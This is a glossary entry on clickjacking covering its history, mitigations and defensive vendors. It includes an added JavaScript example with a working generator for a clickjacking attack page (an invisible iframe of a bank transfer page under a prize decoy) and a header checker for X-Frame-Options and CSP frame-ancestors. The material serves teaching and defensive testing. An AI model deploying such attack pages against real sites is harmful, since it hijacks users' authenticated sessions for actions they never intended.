// THREAT DETECTION AND DATA PRIVACY TERM
Clickjacking
Clickjacking is an attack that tricks a user into clicking on something different from what they perceive. The attacker loads the target page in an invisible frame layered over a legitimate-looking decoy, so the user's click lands on the hidden page and performs an unintended action there, using the session the user already has with that site.
TECHNICAL DEFINITION
Clickjacking, a type of UI redressing attack, is a web security vulnerability in which an attacker uses transparent or opaque layers, typically an iframe positioned and styled with CSS, to trick a user into clicking a button or link on a different page than the one they believe they are interacting with, thereby performing unauthorized actions within the victim's authenticated session.
BACKGROUND
The term clickjacking was introduced by Jeremiah Grossman and Robert Hansen in 2008, although overlay tricks of this kind predate the name. The attack works because the framed page loads with the victim's cookies: any state-changing control a logged-in user can press (transfer funds, change an e-mail address, grant an OAuth consent, press a social-network Like button in the "likejacking" variant) can be triggered by a user who believes they are clicking something else. Browser vendors responded with the X-Frame-Options response header, first shipped in Internet Explorer 8 in 2009 and later documented in RFC 7034, and then with the frame-ancestors directive of Content Security Policy Level 2, which supersedes it and can name the specific origins permitted to frame a page.
SYNONYMS & ALIASES
- UI redressing
- UI redress attack
- likejacking
- iframe overlay
- transparent overlay attack
USAGE NOTE
This attack is mitigated mainly on the server side, by sending the X-Frame-Options header (DENY or SAMEORIGIN) or, preferably, a Content Security Policy whose frame-ancestors directive lists the origins allowed to frame the page; when both are present, browsers honour frame-ancestors and ignore X-Frame-Options, and a Content-Security-Policy-Report-Only header never blocks anything. Cookies marked SameSite=Lax or Strict are not sent when a page is loaded in a cross-site iframe, so the framed page renders unauthenticated and the hijacked click has nothing to act on. JavaScript frame-busting is a weaker fallback, since an attacker can disable the script with the iframe sandbox attribute.
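The two halves of the attack described in the technical definition and the usage note, as an added example that is not part of the original page or any vendor's product: buildClickjackPoc() assembles the attacker page (a transparent iframe of the target stacked over a decoy button and offset so the target's real button sits under the decoy), and framingVerdict() applies the browser rules for X-Frame-Options and CSP frame-ancestors to a set of response headers to decide whether a given attacker origin could frame the target at all. The origins, URLs, coordinates and header values are constructed for illustration; the fallback to DENY on conflicting X-Frame-Options values is an assumption modelled on Chromium's behaviour.

```javascript
// Added example (not from the original page or any vendor): attacker-side PoC page
// builder plus a header check of the kind a scanner runs against a target response.

// Attacker page. The victim sees only the decoy button; the iframe is stacked above it
// (higher z-index) with opacity 0 and shifted so the target's real button lands exactly
// under the decoy. The click reaches the framed page, which handles it with the victim's session.
function buildClickjackPoc(targetUrl, { targetButton, decoy }) {
  const frameTop = decoy.top - targetButton.y;   // negative offsets pull the target's button into place
  const frameLeft = decoy.left - targetButton.x;
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>You won!</title>
<style>
  body { margin: 0; position: relative; }
  #decoy { position: absolute; top: ${decoy.top}px; left: ${decoy.left}px; z-index: 1; }
  #target { position: absolute; top: ${frameTop}px; left: ${frameLeft}px;
            width: 1400px; height: 1000px; border: 0; opacity: 0; z-index: 2; }
</style></head>
<body>
  <button id="decoy">Claim your prize</button>
  <iframe id="target" src="${targetUrl}"></iframe>
</body></html>`;
}

// Lower-case header names and turn every value into an array (Node returns arrays for
// headers that appear more than once).
function normaliseHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    const key = name.toLowerCase();
    out[key] = (out[key] || []).concat(Array.isArray(value) ? value : [String(value)]);
  }
  return out;
}

// Does one frame-ancestors source expression admit `origin`? Handles 'none', 'self', *,
// scheme-only sources (https:), exact hosts and *.wildcard hosts, with optional scheme and port.
function sourceMatchesOrigin(source, origin, selfOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return origin === selfOrigin;
  if (s === '*') return true;
  const o = new URL(origin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return o.protocol === s;        // scheme-source
  const m = s.match(/^([a-z][a-z0-9+.-]*):\/\/(.+)$/);                 // optional scheme prefix
  const scheme = m ? `${m[1]}:` : null;
  const [host, port] = (m ? m[2] : s).split('/')[0].split(':');
  if (scheme && o.protocol !== scheme) return false;
  const originPort = o.port || { 'https:': '443', 'http:': '80' }[o.protocol] || '';
  if (port && port !== '*' && port !== originPort) return false;
  if (host.startsWith('*.')) return o.hostname.endsWith(host.slice(1)); // *.a.b does not match a.b itself
  return o.hostname === host;
}

// Decide whether attackerOrigin can frame a page served from targetOrigin with these headers.
// Precedence follows the browsers: an enforced CSP frame-ancestors directive wins over
// X-Frame-Options, and Content-Security-Policy-Report-Only never blocks anything.
function framingVerdict(headers, targetOrigin, attackerOrigin) {
  const h = normaliseHeaders(headers);
  let sawFrameAncestors = false;
  for (const policy of (h['content-security-policy'] || []).flatMap(v => v.split(','))) {
    const directive = policy.split(';').map(d => d.trim().split(/\s+/))
      .find(tokens => tokens[0].toLowerCase() === 'frame-ancestors');
    if (!directive) continue;
    sawFrameAncestors = true;
    // An empty source list means 'none'; every enforced policy must admit the framer.
    const admitted = directive.slice(1).some(src => sourceMatchesOrigin(src, attackerOrigin, targetOrigin));
    if (!admitted) return { frameable: false, reason: `CSP frame-ancestors does not admit ${attackerOrigin}` };
  }
  if (sawFrameAncestors) return { frameable: true, reason: 'CSP frame-ancestors admits the attacker origin' };

  const values = (h['x-frame-options'] || []).flatMap(v => v.split(',')).map(v => v.trim().toUpperCase());
  if (values.length === 0) return { frameable: true, reason: 'no framing restriction' };
  // Assumption: conflicting values fall back to DENY, as Chromium does.
  const value = new Set(values).size === 1 ? values[0] : 'DENY';
  if (value === 'DENY') return { frameable: false, reason: 'X-Frame-Options: DENY' };
  if (value === 'SAMEORIGIN') {
    return attackerOrigin === targetOrigin
      ? { frameable: true, reason: 'X-Frame-Options: SAMEORIGIN and the framer is same-origin' }
      : { frameable: false, reason: 'X-Frame-Options: SAMEORIGIN' };
  }
  // ALLOW-FROM, ALLOWALL and typos are not recognised by current browsers, so the header is ignored.
  return { frameable: true, reason: `unrecognised X-Frame-Options value "${values.join(', ')}" is ignored` };
}

// Stand-alone demo against constructed values.
if (typeof require !== 'undefined' && require.main === module) {
  const target = 'https://bank.example';
  console.log(framingVerdict({ 'X-Frame-Options': 'ALLOW-FROM https://partner.example' }, target, 'https://evil.example'));
  console.log(buildClickjackPoc(`${target}/transfer`, { targetButton: { x: 400, y: 300 }, decoy: { top: 180, left: 260 } }));
}
```

The check reports the cases that trip people up in practice: an obsolete ALLOW-FROM value, a report-only CSP, and an X-Frame-Options: DENY that is overridden by a permissive frame-ancestors list all leave the page frameable.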
DEVELOPERS
Organizations developing tools and services for finding or defending against clickjacking.
Creator of Burp Suite, a leading web application security testing toolkit used by cybersecurity professionals to find and test for vulnerabilities, including susceptibility to clickjacking; its Clickbandit tool generates a clickjacking proof of concept against a target page.
A non-profit organization focused on improving software security. They develop open-source tools like the Zed Attack Proxy (ZAP) to find vulnerabilities and publish critical guidance, such as the Clickjacking Defense Cheat Sheet, for developers.
Provides a global network and security services, including a Web Application Firewall (WAF) that helps protect websites from clickjacking by automatically managing and enforcing security headers like Content-Security-Policy and X-Frame-Options.
A cybersecurity company specializing in Web Application Firewall (WAF) technology. Their solutions are designed to protect applications by detecting and blocking threats in real time, including UI redressing attacks such as clickjacking.
Develops a cloud-based security and compliance platform. Its Web Application Scanning (WAS) service automatically discovers and catalogs web applications and detects vulnerabilities, including misconfigurations that leave sites open to clickjacking.
A content delivery network (CDN) and cloud services provider that offers security solutions like the Kona Site Defender. This technology protects web applications at the network edge, mitigating attacks such as clickjacking before they reach the origin infrastructure.
Through the development of the Chrome browser and advocacy for web standards, Google builds and implements the fundamental client-side protections against clickjacking: enforcement of the X-Frame-Options header and of the Content Security Policy (CSP) frame-ancestors directive.
Provides security analytics and automation. Their vulnerability scanner, Nexpose, and penetration testing tool, Metasploit, are used by security teams to identify and validate system weaknesses, including those related to clickjacking.